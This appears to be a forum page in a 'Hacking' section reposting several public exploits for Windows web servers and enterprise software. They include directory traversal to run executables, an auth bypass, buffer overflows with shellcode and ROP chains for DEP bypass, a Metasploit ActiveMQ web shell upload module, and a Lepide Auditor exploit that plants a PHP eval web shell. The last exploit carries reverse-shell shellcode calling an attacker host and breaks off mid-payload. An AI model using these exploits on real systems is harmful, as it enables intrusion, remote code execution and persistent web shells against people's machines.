    # Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution # Date: 26/05/2017 # Exploit Author: Guillaume Kaddouch # Twitter: @gkweb76 # Blog: https://networkfilter.blogspot.com # GitHub: https://github.com/gkweb76/exploits # Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore) # Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html # Version: 1.9.1 (build 164) # Tested on: Windows 7 SP1 Family x64 (FR) # Category: Webapps """ Disclosure Timeline: -------------------- 2017-05-26: Vulnerability discovered 2017-05-26: Vendor website is down, no way to contact him Description : ------------- Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal, it is possible to run any executable being on the remote host. Instructions: ------------- - Starts Home Web Server. - Run this exploit from a remote Kali machine with netcat as below. """ # Connect with netcat, then drop a single POST to call the executable you want [email protected]:~/kiwi_syslog$ nc 10.0.0.100 80 POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1 # Returned response HTTP/1.1 400 Bad Request Connection: close Content-Length: 0 Server: My Web Server (HWS164) """ [CTRL+C] : this is important to launch the executable we requested Calc.exe has been launched on the remote host. """
  13. Hacking

    # Exploit Title: EFS Web Server 7.2 Authentication Bypass # Date: 11-06-2017 # Software Link: http://www.sharing-file.com/efssetup.exe # Software Version : 7.2 # Exploit Author: Touhid M.Shaikh # Contact: http://twitter.com/touhidshaikh22 # Website: http://touhidshaikh.com/ ######## Description ######## <!-- What is Easy File Sharing Web Server 7.2 ? Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs.They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption. --> ######## Video PoC and Article ######## https://www.youtube.com/watch?v=XlTH7Fm1m1w http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/ ######## Attact Description ######## <!-- Note: No Need to Login...bcz this is auth bypass vulnerability .hehehe. ==>START<== Any visitor.. We can Bypass the Login Screen by just Change the URL and Browse the Drives. bingoo... --> ######## Proof of Concept ######## When we visit the EFS web server its prompt for login, now attacker just change url to below. Exploit.... http://192.168.1.14/disk_c/ in this case change drvie by just change /disk_c to /disk_<Drive latter> example. /disk_d , /disk_f etc ============================================= NOTE :: :: Now We have Permission to View Drives and Folder and Download Files. in Diffrent Drives or folder. ============================================
  14. Hacking

    #!/usr/bin/python # Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow # Author : Touhid M.Shaikh # Date : 12 June, 2017 # Contact: [email protected] # Version: 7.2 # category: Remote Exploit # Tested on: Windows XP SP3 EN [Version 5.1.2600] """ ######## Description ######## What is Easy File Sharing Web Server 7.2 ? Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs.They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption. ######## Video PoC and Article ######## https://www.youtube.com/watch?v=Mdmd-7M8j-M http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/ """ import httplib total = 4096 #Shellcode Open CMD.exe shellcode = ( "\x8b\xec\x55\x8b\xec" "\x68\x65\x78\x65\x2F" "\x68\x63\x6d\x64\x2e" "\x8d\x45\xf8\x50\xb8" "\xc7\x93\xc2\x77" "\xff\xd0") our_code = "\x90"*100 #NOP Sled our_code += shellcode our_code += "\x90"*(4072-100-len(shellcode)) # point Ret to Nop Sled our_code += "\x3c\x62\x83\x01" # Overwrite RET our_code += "\x90"*12 #Nop Sled our_code += "A"*(total-(4072+16)) # ESP pointing # Server address and POrt httpServ = httplib.HTTPConnection("192.168.1.6", 80) httpServ.connect() httpServ.request('POST', '/sendemail.ghp', 'Email=%s&getPassword=Get+Password' % our_code) response = httpServ.getresponse() httpServ.close() """ NOTE : After Exiting to cmd.exe our server will be crash bcz of esp Adjust esp by yourself ... hehhehhe... """
  15. #!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP) # Exploit Author: bl4ck h4ck3r # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows XP SP2, Windows 2008 R2 x64 import socket import struct import sys if len(sys.argv) < 2: print "\nUsage: " + sys.argv[0] + " <host>\n" exit() # 0x1002280a : # ADD ESP,1004 # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} ret = struct.pack("<I", 0x1002280a) # nopsled shellcode = "\x90"*200 # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49" shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70" shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74" shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c" shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58" shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f" shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c" shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47" shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62" shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c" shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71" shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73" shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69" shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61" shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61" shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43" shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55" shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61" shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b" shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64" shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54" shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a" shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a" shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a" shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30" shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f" shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35" shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d" shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c" shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35" shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a" shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31" shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45" shellcode += "\x45\x50\x41\x41" def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ # 0x00000000, # [-] Unable to find gadget to put 00000201 into ebx 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFFDFE, # -202 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ} 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x1004de84, # &Writable location [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll] 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 0x100218f9, # POP EBP # RETN [ImageLoad.dll] 0x61c24169, # & push esp # ret [sqlite3.dll] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x1001bd98, # POP ECX # RETN [ImageLoad.dll] 0x1004de84, # &Writable location [ImageLoad.dll] 0x61c373a4, # POP EDI # RETN [sqlite3.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password") s.close()
  16. Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ActiveMQ web shell upload', 'Description' => %q( The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. ), 'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-3088' ], [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ] ], 'Privileged' => true, 'Platform' => %w{ java linux win }, 'Targets' => [ [ 'Java Universal', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ], [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ] ], 'DisclosureDate' => "Jun 01 2016", 'DefaultTarget' => 0)) register_options( [ OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]), OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]), OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]), Opt::RPORT(8161) ]) register_advanced_options( [ OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil]) ]) end def jsp_text(payload_name) %{ <%@ page import="java.io.*" %><%@ page import="java.net.*" %><% URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("./#{payload_name}.jar")).toURI().toURL()}); Class c = cl.loadClass("metasploit.Payload"); c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]}); %>} end def exploit jar_payload = payload.encoded_jar.pack payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8)) host = "#{datastore['RHOST']}:#{datastore['RPORT']}" @url = datastore['SSL'] ? "https://#{host}" : "http://#{host}" paths = get_upload_paths paths.each do |path| if try_upload(path, jar_payload, payload_name) break handler if trigger_payload(payload_name) print_error('Unable to trigger payload') end end end def try_upload(path, jar_payload, payload_name) ['.jar', '.jsp'].each do |ext| file_name = payload_name + ext data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" } upload_uri = normalize_uri('fileserver', file_name) print_status("Uploading #{move_headers['Destination']}") register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true') return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) && send_request('MOVE', upload_uri, 204, 'headers' => move_headers) @trigger_resource = /webapps(.*)/.match(path)[1] end true end def get_upload_paths base_path = "#{get_install_path}/webapps" custom_path = datastore['UploadPath'] return [normalize_uri(base_path, custom_path)] unless custom_path.nil? [ "#{base_path}/api/", "#{base_path}/admin/" ] end def get_install_path properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body match = properties_page.tr("\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/) return match[1] unless match.nil? end def send_request(method, uri, expected_response = 200, opts = {}) opts['headers'] ||= {} opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass']) opts['headers']['Connection'] = 'close' r = send_request_cgi( { 'method' => method, 'uri' => uri }.merge(opts) ) return false if r.nil? || expected_response != r.code.to_i r end def trigger_payload(payload_name) send_request('POST', @url + @trigger_resource + payload_name + '.jsp') end def error_out print_error('Upload failed') @trigger_resource = nil false end end
  17. #!/usr/bin/python """ Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability Vendor: http://www.lepide.com/ File: lepideauditorsuite.zip SHA1: 3c003200408add04308c04e3e0ae03b7774e4120 Download: http://www.lepide.com/lepideauditor/download.html Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/ Summary: ======== The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root. Additional code: ================ When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code: [email protected]:~# cat client-poc.py #!/usr/bin/python import requests import sys if len(sys.argv) < 3: print "(+) usage: %s <target> <attacker's server>" % sys.argv[0] sys.exit(-1) target = sys.argv[1] server = sys.argv[2] s = requests.Session() print "(+) sending auth bypass" s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False) print "(+) sending code execution request" s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'[email protected]','id':'6'}) Example: ======== [email protected]:~# ./server-poc.py Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution by mr_me 2016 (+) waiting for the target... (+) connected by ('172.16.175.174', 50541) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) connected by ('172.16.175.174', 50542) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) got a column request (+) got http request id: 6 (+) got http request path: lol (+) send string successful (+) got a filename request (+) got http request daterange: [email protected] - 23:59:59 (+) got http request id: 6 (+) got http request path: lol (+) successfully sent tag (+) successfully sent file! (+) file sent successfully (+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo(); In another console: [email protected]:~# ./client-poc.py 172.16.175.174 172.16.175.1 (+) sending auth bypass (+) sending code execution request """ import struct import socket from thread import start_new_thread import struct LOGIN = 601 COLUMN = 604 FILENAME = 603 VALID = 2 TAGR = 4 FILEN = 5 SUCCESS = "_SUCCESS_" def get_string(conn): size = struct.unpack(">i", conn.recv(4))[0] data = conn.recv(size).decode("utf-16") conn.send(struct.pack(">i", VALID)) return data def send_string(conn, string): size = len(string.encode("utf-16-le")) conn.send(struct.pack(">i", size)) conn.send(string.encode("utf-16-le")) return struct.unpack(">i", conn.recv(4))[0] def send_tag(conn, tag): conn.send(struct.pack(">i", TAGR)) conn.send(struct.pack(">i", tag)) return struct.unpack(">i", conn.recv(4))[0] def send_file(conn, filedata): if send_tag(conn, FILEN) == 2: print "(+) successfully sent tag" # send length of file conn.send(struct.pack(">i", len(filedata.encode("utf-16-le")))) # send the malicious payload conn.send(filedata.encode("utf-16-le")) if struct.unpack(">i", conn.recv(4))[0] == 2: print "(+) successfully sent file!" if send_tag(conn, VALID) == 2: return True return False def client_thread(conn): """ Let's put it this way, my mum's not proud of my code. """ while True: data = conn.recv(4) if data: resp = struct.unpack(">i", data)[0] if resp == 4: code = conn.recv(resp) resp = struct.unpack(">i", code)[0] # stage 1 if resp == LOGIN: print "(+) got a login request" # send a VALID response back conn.send(struct.pack(">i", VALID)) # now we expect to get the username and password print "(+) got a username: %s" % get_string(conn) print "(+) got a password: %s" % get_string(conn) # now we try to send to send a success packet print "(+) sending SUCCESS packet" if send_string(conn, SUCCESS) == 2: print "(+) send string successful" # stage 2 elif resp == COLUMN: print "(+) got a column request" # send a VALID response back conn.send(struct.pack(">i", VALID)) print "(+) got http request id: %s" % get_string(conn) print "(+) got http request path: %s" % get_string(conn) if send_string(conn, "foo-bar") == 2: print "(+) send string successful" # stage 3 - this is where the exploitation is elif resp == FILENAME: print "(+) got a filename request" conn.send(struct.pack(">i", VALID)) # now we read back 3 strings... print "(+) got http request daterange: %s" % get_string(conn) print "(+) got http request id: %s" % get_string(conn) print "(+) got http request path: %s" % get_string(conn) # exploit! if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"): print "(+) file sent successfully" print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0]) break conn.close() HOST = '0.0.0.0' PORT = 1056 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(10) print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution" print "by mr_me 2016\t\n" print "(+) waiting for the target..." while True: # blocking call, waits to accept a connection conn, addr = s.accept() print '(+) connected by %s' % addr start_new_thread(client_thread, (conn,)) s.close()
  18. #!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 - GET Buffer Overflow (DEP Bypass with ROP) # Date: 8 July 2017 # Exploit Author: Sungchul Park # Author Contact: [email protected] # Vendor Homepage: http://www.sharing-file.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server 7.2 # Tested on: Winows 7 SP1 import socket, struct def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ # For EDX -> flAllocationType(0x1000) [ EAX to EBX ] # 0x00000000, # [-] Unable to find gadget to put 00001000 into edx 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFEFFF, # -1001 (static value) 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] 0x1001614d, # DEC EAX # RETN [ImageLoad.dll] 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x1004de84, # &Writable location [ImageLoad.dll] # For EDX -> flAllocationType(0x1000) [ EBX to EDX ] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] 0x10022c1e, # ADD EDX,EBX # POP EBX # RETN 0x10 [ImageLoad.dll] 0xffffffff, # Filler (Compensation for POP EBX) # For ESI -> &VirtualAlloc 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xffffffff, # Filler \ 0xffffffff, # Filler | 0xffffffff, # Filler | => (Compensation for RETN 0x10) 0xffffffff, # Filler / 0x1004d1fc, # ptr to &VirtualAlloc() [IAT ImageLoad.dll] 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001aeb4, # POP ESI # RETN [ImageLoad.dll] 0xffffffff, # 0x1001715d, # INC ESI # ADD AL,3A # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] # For EBP -> Return Address 0x10013860, # POP EBP # RETN [ImageLoad.dll] 0x61c24169, # & push esp # ret [sqlite3.dll] # For EBX -> dwSize(0x01) 0x100132ba, # POP EBX # RETN [ImageLoad.dll] 0xffffffff, # 0x61c2785d, # INC EBX # ADD AL,83 # RETN [sqlite3.dll] 0x1001f6da, # INC EBX # ADD AL,83 # RETN [ImageLoad.dll] # For ECX -> flProtect(0x40) 0x10019dfa, # POP ECX # RETN [ImageLoad.dll] 0xffffffff, # 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll] 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] # For EDI -> ROP NOP 0x61c373a4, # POP EDI # RETN [sqlite3.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] # For EAX -> NOP(0x90) 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() # msfvenom -p windows/shell/reverse_tcp LHOST=192.168.44.128 LPORT=8585 -b "\x00\x3b" -e x86/shikata_ga_nai -f python -v shellcode shellcode = "\x90"*200 shellcode += "\xdb\xdd\xbb\x5e\x78\x34\xc0\xd9\x74\x24\xf4\x5e" shellcode += "\x29\xc9\xb1\x54\x31\x5e\x18\x03\x5e\x18\x83\xc6" shellcode += "\x5a\x9a\xc1\x3c\x8a\xd8\x2a\xbd\x4a\xbd\xa3\x58" shellcode += "\x7b\xfd\xd0\x29\x2b\xcd\x93\x7c\xc7\xa6\xf6\x94" shellcode += "\x5c\xca\xde\x9b\xd5\x61\x39\x95\xe6\xda\x79\xb4" shellcode += "\x64\x21\xae\x16\x55\xea\xa3\x57\x92\x17\x49\x05" shellcode += "\x4b\x53\xfc\xba\xf8\x29\x3d\x30\xb2\xbc\x45\xa5" shellcode += "\x02\xbe\x64\x78\x19\x99\xa6\x7a\xce\x91\xee\x64" shellcode += "\x13\x9f\xb9\x1f\xe7\x6b\x38\xf6\x36\x93\x97\x37" shellcode += "\xf7\x66\xe9\x70\x3f\x99\x9c\x88\x3c\x24\xa7\x4e" shellcode += "\x3f\xf2\x22\x55\xe7\x71\x94\xb1\x16\x55\x43\x31" shellcode += "\x14\x12\x07\x1d\x38\xa5\xc4\x15\x44\x2e\xeb\xf9" shellcode += "\xcd\x74\xc8\xdd\x96\x2f\x71\x47\x72\x81\x8e\x97" shellcode += "\xdd\x7e\x2b\xd3\xf3\x6b\x46\xbe\x9b\x58\x6b\x41" shellcode += "\x5b\xf7\xfc\x32\x69\x58\x57\xdd\xc1\x11\x71\x1a" shellcode += "\x26\x08\xc5\xb4\xd9\xb3\x36\x9c\x1d\xe7\x66\xb6" shellcode += "\xb4\x88\xec\x46\x39\x5d\x98\x43\xad\x9e\xf5\x60" shellcode += "\xad\x77\x04\x79\x8c\x0e\x81\x9f\x9e\x40\xc2\x0f" shellcode += "\x5e\x31\xa2\xff\x36\x5b\x2d\xdf\x26\x64\xe7\x48" shellcode += "\xcc\x8b\x5e\x20\x78\x35\xfb\xba\x19\xba\xd1\xc6" shellcode += "\x19\x30\xd0\x37\xd7\xb1\x91\x2b\x0f\xa0\x59\xb4" shellcode += "\xcf\x49\x5a\xde\xcb\xdb\x0d\x76\xd1\x3a\x79\xd9" shellcode += "\x2a\x69\xf9\x1e\xd4\xec\xc8\x55\xe2\x7a\x75\x02" shellcode += "\x0a\x6b\x75\xd2\x5c\xe1\x75\xba\x38\x51\x26\xdf" shellcode += "\x47\x4c\x5a\x4c\xdd\x6f\x0b\x20\x76\x18\xb1\x1f" shellcode += "\xb0\x87\x4a\x4a\xc3\xc0\xb5\x08\xe1\x68\xde\xf2" shellcode += 